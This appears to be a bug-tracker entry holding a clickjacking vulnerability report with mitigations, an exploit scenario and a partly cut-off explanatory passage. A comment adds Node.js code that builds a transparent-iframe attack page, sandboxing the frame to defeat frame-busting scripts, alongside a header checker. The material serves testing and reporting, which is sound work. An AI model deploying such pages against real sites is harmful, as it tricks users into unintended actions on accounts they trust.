> Header always append X-Frame-Options DENY
>
> 4.2. FrameBusting JavaScript
>
> This method utilizes JavaScript to “bust” iframes. This is done by
> checking if the current web page is the top web page (not within a frame)
> and if the web page is currently not the top page, then it becomes the top
> page.
>
> The following example segment of code can be used to demonstrate this:
>
> // Frame busting: if this document is not the top-level page, navigate the
> // top-level window to this page. Reading top.location.hostname throws a
> // SecurityError when the parent is cross-origin, so the window objects
> // themselves are compared instead.
> if (top !== self) {
>     top.location.href = self.location.href;
> }
>
> It should be noted that recent techniques have been found to bypass this
> clickjacking prevention technique, as seen in the whitepaper by web
> application security researcher Collin Jackson –
> http://www.collinjackson.com/research/xssauditor.pdf.
>
> 4.3. Unique URL request
>
> Similar to a CSRF nonce, this can be employed so attackers cannot deliver
> the attack URL easily.
>
> 4.4. CAPTCHAs
>
> Similar to the way it prevents attackers from spamming a web form, this
> can be used as an additional layer of verification on each transaction.
>
> 4.5. Element Randomization
>
> Generally it is possible to clickjack due to buttons and links being in a
> static area of the web page, allowing attackers to place invisible frames
> over them. A technique to prevent this from occurring is to randomize the
> links or buttons on load, thus preventing attackers from hard coding static
> iframes.
>
>
> Proof of concept:
>
> [screenshot: image.png]
>
> EXPLOIT:
>
> The impact is high. This vulnerability can be linked to a multitude of
> attacks, including keylogging and stealing user credentials.
>
> An example of an attack on an application could consist of sending out
> emails to authenticated users of the application. This would require some
> amount of inside knowledge to target specific users. Alternatively, mass
> emails could be sent out in the hope that one user logged in to the
> application responds. The email would contain an “interesting” link which
> directs the victim to a landing page displaying an advert.
>
> On the landing page is a “skip this ad” link that has a transparent iframe
> located over it (placed by the attacker). When the victim then clicks on
> the link, they will interact with the attacker’s malicious code.
>
> Further examples of clickjacking attacks have occurred in the past on
> social media sites, where victims were enticed into clicking links which
> spammed their contacts, as reported by BBC News –
> http://www.bbc.co.uk/news/10224434.
>
> The clickjacking attack:
>
> The “clickjacking” attack allows an evil page to click on a “victim site”
> on behalf of the visitor.
>
> Many sites were hacked this way, including Twitter, Facebook, Paypal and
> other sites. They are all fixed, of course.
>
> The idea:
>
> The idea is very simple.
>
> Here’s how clickjacking was done with Facebook:
>
> A visitor is lured to the evil page. It doesn’t matter how.
> The page has a harmless-looking link on it (like “get rich now” or “click
> here, very funny”).
> Over that link the evil page positions a transparent
>
> Click here!
>
Duplicate
🐞 Bugs
Tech Issues
Almost 2 years ago

Ahmed Chauhan
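The landing-page scenario from the report (a transparent iframe laid over a "skip this ad" link) and the frame-busting script of its section 4.2, as an added example that is not part of the original report or the affected application: a small Node.js helper that builds the attacker's landing page and a checker that tells, from a response's headers, whether a browser would let that page frame the target. The target URL, decoy text, pixel offsets, origin names and header sets are assumed values for the demo; the iframe `sandbox` attribute is a widely documented way to defeat script-only frame busting and is not something the report itself describes.

```javascript
// Added example, not part of the original report. Plain Node.js, no dependencies.
//   buildPoc()       builds the attacker's landing page: a transparent iframe of
//                    the target laid over a decoy "skip this ad" link. With
//                    neutraliseFrameBusting the frame gets a sandbox attribute
//                    that omits allow-top-navigation, so a frame-busting script
//                    inside it cannot set top.location (section 4.2 alone fails).
//   framingVerdict() decides whether a response's headers let a browser frame the
//                    page from a given attacker origin: CSP frame-ancestors takes
//                    precedence; otherwise X-Frame-Options is read as the HTML
//                    spec's check does (DENY / SAMEORIGIN / conflicting values;
//                    ALLOW-FROM and unknown values give no protection today).
// All URLs, offsets and header sets below are assumed values for the demo.

function buildPoc(targetUrl, opts = {}) {
  const { offsetX = -220, offsetY = -310, decoy = 'Skip this ad', neutraliseFrameBusting = false } = opts;
  const src = String(targetUrl).replace(/&/g, '&amp;').replace(/"/g, '&quot;');
  // Scripts run and forms submit, but top-level navigation is withheld.
  const sandbox = neutraliseFrameBusting ? ' sandbox="allow-forms allow-scripts allow-same-origin"' : '';
  return `<!DOCTYPE html>
<html><head><style>
  #decoy  { position: absolute; top: 120px; left: 40px; z-index: 1; }
  /* The frame is shifted so the target's sensitive button sits on the decoy,
     made fully transparent, and stacked above it so it receives the click. */
  #victim { position: absolute; top: ${offsetY}px; left: ${offsetX}px;
            width: 1000px; height: 800px; opacity: 0; border: 0; z-index: 2; }
</style></head>
<body>
  <p>Advertisement</p>
  <a id="decoy" href="#">${decoy}</a>
  <iframe id="victim" src="${src}"${sandbox}></iframe>
</body></html>`;
}

// Header values as a list: arrays (Node's http module) and comma-joined strings
// are both accepted, matching how browsers "get, decode and split" a header.
function headerValues(headers, name) {
  const raw = headers[name.toLowerCase()];
  if (raw === undefined) return [];
  return (Array.isArray(raw) ? raw : [raw])
    .flatMap((v) => String(v).split(','))
    .map((v) => v.trim())
    .filter(Boolean);
}

// Simplified CSP source-expression match for frame-ancestors: 'none', 'self', '*',
// scheme-only sources ("https:") and host sources with an optional scheme and a
// leading "*." wildcard. Ports and paths are ignored in this model.
function sourceMatches(source, targetOrigin, attackerOrigin) {
  const s = source.replace(/^'|'$/g, '').toLowerCase();
  if (s === 'none') return false;
  if (s === '*') return true;
  if (s === 'self') return attackerOrigin.toLowerCase() === targetOrigin.toLowerCase();
  const attacker = new URL(attackerOrigin);
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return attacker.protocol === s;
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:/]+)/.exec(s);
  if (!m) return false;
  const [, scheme, wildcard, host] = m;
  if (scheme && `${scheme}:` !== attacker.protocol) return false;
  return wildcard ? attacker.hostname.endsWith(`.${host}`) : attacker.hostname === host;
}

function framingVerdict(headers, targetOrigin, attackerOrigin) {
  // 1. Any policy carrying frame-ancestors overrides X-Frame-Options.
  const ancestorLists = [];
  for (const policy of headerValues(headers, 'content-security-policy')) {
    for (const directive of policy.split(';')) {
      const [name, ...sources] = directive.trim().split(/\s+/);
      if (name && name.toLowerCase() === 'frame-ancestors') ancestorLists.push(sources);
    }
  }
  if (ancestorLists.length > 0) {
    const allowed = ancestorLists.every((sources) =>
      sources.some((src) => sourceMatches(src, targetOrigin, attackerOrigin)));
    return { frameable: allowed, reason: `frame-ancestors ${allowed ? 'allows' : 'blocks'} ${attackerOrigin}` };
  }
  // 2. Otherwise X-Frame-Options, read the way the HTML spec's check does.
  const xfo = [...new Set(headerValues(headers, 'x-frame-options').map((v) => v.toLowerCase()))];
  if (xfo.length === 0) return { frameable: true, reason: 'no anti-framing header' };
  if (xfo.length > 1) {
    // Conflicting values block only if a recognised directive is among them
    // (e.g. "SAMEORIGIN, DENY", which "Header append" can produce).
    const blocks = xfo.some((v) => v === 'deny' || v === 'sameorigin' || v === 'allowall');
    return { frameable: !blocks, reason: `conflicting X-Frame-Options: ${xfo.join(', ')}` };
  }
  if (xfo[0] === 'deny') return { frameable: false, reason: 'X-Frame-Options: DENY' };
  if (xfo[0] === 'sameorigin') {
    const same = attackerOrigin.toLowerCase() === targetOrigin.toLowerCase();
    return { frameable: same, reason: 'X-Frame-Options: SAMEORIGIN' };
  }
  return { frameable: true, reason: `X-Frame-Options "${xfo[0]}" is not honoured by current browsers` };
}

// Constructed sample: the target sends no anti-framing header, so the PoC works.
const SAMPLE_TARGET = 'https://app.example';
const SAMPLE_HEADERS = { 'content-type': 'text/html' };
if (typeof module !== 'undefined' && require.main === module) {
  console.log(framingVerdict(SAMPLE_HEADERS, SAMPLE_TARGET, 'https://evil.example'));
  console.log(buildPoc(`${SAMPLE_TARGET}/account/transfer`, { neutraliseFrameBusting: true }));
}
```

Run it with `node poc.js`; feed `framingVerdict` the headers captured from the target (for example `res.headers` from `http.get`) to confirm the finding before writing it up, and note that `Header always append` can leave two X-Frame-Options values on a response that already sets one, which this checker models as the browser does.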